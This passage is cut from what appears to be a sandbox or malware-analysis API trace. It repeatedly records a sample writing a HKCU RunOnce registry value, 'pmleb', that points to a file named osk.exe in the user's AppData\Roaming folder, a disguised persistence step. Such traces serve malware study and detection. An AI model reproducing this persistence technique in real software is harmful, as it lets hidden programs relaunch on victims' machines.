nIDEvent=0x2463, uElapse=0xa, lpTimerFunc=0x0) returned 0x2463 [0109.425] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.440] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.440] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.440] KillTimer (hWnd=0x20280, uIDEvent=0x2463) returned 1 [0109.440] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.440] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.441] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.441] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.441] RegCloseKey (hKey=0x280) returned 0x0 [0109.441] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.441] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.441] SetTimer (hWnd=0x20280, nIDEvent=0x2464, uElapse=0xa, lpTimerFunc=0x0) returned 0x2464 [0109.441] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.455] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.456] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.456] KillTimer (hWnd=0x20280, uIDEvent=0x2464) returned 1 [0109.456] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.456] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.456] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.457] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.457] RegCloseKey (hKey=0x280) returned 0x0 [0109.457] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.457] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.457] SetTimer (hWnd=0x20280, nIDEvent=0x2465, uElapse=0xa, lpTimerFunc=0x0) returned 0x2465 [0109.457] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.471] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.471] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.471] KillTimer (hWnd=0x20280, uIDEvent=0x2465) returned 1 [0109.471] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.472] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.472] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.472] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.472] RegCloseKey (hKey=0x280) returned 0x0 [0109.472] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.472] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.472] SetTimer (hWnd=0x20280, nIDEvent=0x2466, uElapse=0xa, lpTimerFunc=0x0) returned 0x2466 [0109.473] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.486] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.486] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.487] KillTimer (hWnd=0x20280, uIDEvent=0x2466) returned 1 [0109.487] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.488] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.488] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.488] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.488] RegCloseKey (hKey=0x280) returned 0x0 [0109.488] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.489] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.489] SetTimer (hWnd=0x20280, nIDEvent=0x2467, uElapse=0xa, lpTimerFunc=0x0) returned 0x2467 [0109.489] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.198] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.198] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.199] KillTimer (hWnd=0x20280, uIDEvent=0x2467) returned 1 [0110.199] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.200] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.200] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.200] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.200] RegCloseKey (hKey=0x280) returned 0x0 [0110.200] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.200] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.200] SetTimer (hWnd=0x20280, nIDEvent=0x2468, uElapse=0xa, lpTimerFunc=0x0) returned 0x2468 [0110.200] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.204] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.204] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.204] KillTimer (hWnd=0x20280, uIDEvent=0x2468) returned 1 [0110.205] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.205] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.205] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.205] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.205] RegCloseKey (hKey=0x280) returned 0x0 [0110.206] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.206] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.206] SetTimer (hWnd=0x20280, nIDEvent=0x2469, uElapse=0xa, lpTimerFunc=0x0) returned 0x2469 [0110.206] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.220] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.220] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.220] KillTimer (hWnd=0x20280, uIDEvent=0x2469) returned 1 [0110.220] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.221] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.221] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.221] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.221] RegCloseKey (hKey=0x280) returned 0x0 [0110.221] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.221] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.221] SetTimer (hWnd=0x20280, nIDEvent=0x246a, uElapse=0xa, lpTimerFunc=0x0) returned 0x246a [0110.222] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.235] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.235] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.235] KillTimer (hWnd=0x20280, uIDEvent=0x246a) returned 1 [0110.236] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.236] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.236] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.236] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.237] RegCloseKey (hKey=0x280) returned 0x0 [0110.237] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.237] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.237] SetTimer (hWnd=0x20280, nIDEvent=0x246b, uElapse=0xa, lpTimerFunc=0x0) returned 0x246b [0110.237] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.251] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.251] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.251] KillTimer (hWnd=0x20280, uIDEvent=0x246b) returned 1 [0110.251] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.251] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.252] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.252] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.252] RegCloseKey (hKey=0x280) returned 0x0 [0110.252] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.252] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.252] SetTimer (hWnd=0x20280, nIDEvent=0x246c, uElapse=0xa, lpTimerFunc=0x0) returned 0x246c [0110.252] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.266] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.266] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.267] KillTimer (hWnd=0x20280, uIDEvent=0x246c) returned 1 [0110.267] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.267] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.267] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.268] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.268] RegCloseKey (hKey=0x280) returned 0x0 [0110.268] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.268] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.268] SetTimer (hWnd=0x20280, nIDEvent=0x246d, uElapse=0xa, lpTimerFunc=0x0) returned 0x246d [0110.268] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.282] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.282] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.282] KillTimer (hWnd=0x20280, uIDEvent=0x246d) returned 1 [0110.282] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.283] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.283] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.283] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.283] RegCloseKey (hKey=0x280) returned 0x0 [0110.283] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.283] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.283] SetTimer (hWnd=0x20280, nIDEvent=0x246e, uElapse=0xa, lpTimerFunc=0x0) returned 0x246e [0110.284] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.329] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.329] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.329] KillTimer (hWnd=0x20280, uIDEvent=0x246e) returned 1 [0110.329] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.330] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.330] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.330] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.330] RegCloseKey (hKey=0x280) returned 0x0 [0110.330] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.330] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.330] SetTimer (hWnd=0x20280, nIDEvent=0x246f, uElapse=0xa, lpTimerFunc=0x0) returned 0x246f [0110.331] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.344] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.344] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.345] KillTimer (hWnd=0x20280, uIDEvent=0x246f) returned 1 [0110.345] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.345] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.345] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.346] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.346] RegCloseKey (hKey=0x280) returned 0x0 [0110.346] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.346] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.346] SetTimer (hWnd=0x20280, nIDEvent=0x2470, uElapse=0xa, lpTimerFunc=0x0) returned 0x2470 [0110.346] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.360] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.360] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.360] KillTimer (hWnd=0x20280, uIDEvent=0x2470) returned 1 [0110.360] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.361] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.361] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.361] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.361] RegCloseKey (hKey=0x280) returned 0x0 [0110.361] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.361] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.361] SetTimer (hWnd=0x20280, nIDEvent=0x2471, uElapse=0xa, lpTimerFunc=0x0) returned 0x2471 [0110.362] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.375] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.376] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.376] KillTimer (hWnd=0x20280, uIDEvent=0x2471) returned 1 [0110.376] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.376] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.376] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.377] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.377] RegCloseKey (hKey=0x280) returned 0x0 [0110.377] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.377] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.377] SetTimer (hWnd=0x20280, nIDEvent=0x2472, uElapse=0xa, lpTimerFunc=0x0) returned 0x2472 [0110.377] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.391] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.391] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.391] KillTimer (hWnd=0x20280, uIDEvent=0x2472) returned 1 [0110.392] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.392] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.392] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.392] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.392] RegCloseKey (hKey=0x280) returned 0x0 [0110.393] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.393] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.393] SetTimer (hWnd=0x20280, nIDEvent=0x2473, uElapse=0xa, lpTimerFunc=0x0) returned 0x2473 [0110.393] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.407] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.407] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.407] KillTimer (hWnd=0x20280, uIDEvent=0x2473) returned 1 [0110.407] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.408] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.408] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.408] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.408] RegCloseKey (hKey=0x280) returned 0x0 [0110.409] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.409] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.409] SetTimer (hWnd=0x20280, nIDEvent=0x2474, uElapse=0xa, lpTimerFunc=0x0) returned 0x2474 [0110.409] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.422] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.422] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.422] KillTimer (hWnd=0x20280, uIDEvent=0x2474) returned 1 [0110.423] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.423] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.423] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.423] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.424] RegCloseKey (hKey=0x280) returned 0x0 [0110.424] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.424] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.424] SetTimer (hWnd=0x20280, nIDEvent=0x2475, uElapse=0xa, lpTimerFunc=0x0) returned 0x2475 [0110.424] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.439] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.439] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.439] KillTimer (hWnd=0x20280, uIDEvent=0x2475) returned 1 [0110.439] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.440] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.440] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, 